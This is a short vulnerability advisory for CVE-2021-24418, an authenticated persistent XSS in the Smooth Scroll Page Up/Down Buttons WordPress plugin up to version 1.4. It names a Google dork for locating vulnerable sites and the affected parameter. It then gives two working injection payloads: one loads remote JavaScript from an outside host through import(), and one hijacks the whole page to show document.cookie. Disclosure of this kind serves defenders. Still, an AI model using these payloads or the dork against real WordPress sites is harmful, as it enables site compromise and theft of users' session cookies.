/*! - # VULNERABILITY: Smooth Scroll Page Up/Down Buttons WordPress Plugin <= 1.4 - Authenticated Persistent XSS - # GOOGLE DORK: inurl:/wp-content/plugins/smooth-page-scroll-updown-buttons/ - # DATE: 2021-04-29 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Mark Senff [ http://www.senff.com ] - # SOFTWARE VERSION: <= 1.4 - # SOFTWARE LINK: https://wordpress.org/plugins/smooth-page-scroll-updown-buttons/ - # CVSS: AV:N/AC:L/PR:H/UI:R/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24418 */ ### -- [ Info: ] [i] An Authenticated Persistent XSS vulnerability was discovered in the Smooth Scroll Page Up/Down Buttons plugin through v1.4 for WordPress. [i] Vulnerable parameter(s): $page_scroll_buttons_options['psb_positioning'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:212-215). ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] m0ze" style=position:fixed!important;z-index:99999;display:flex;align-items:center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important; onmousemove=;import(`https://m0ze.ru/payload/a.js`); m0ze= [$] m0ze" style=position:fixed!important;z-index:99999;display:flex;align-items:center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important; onmousemove=;alert(document.cookie); ">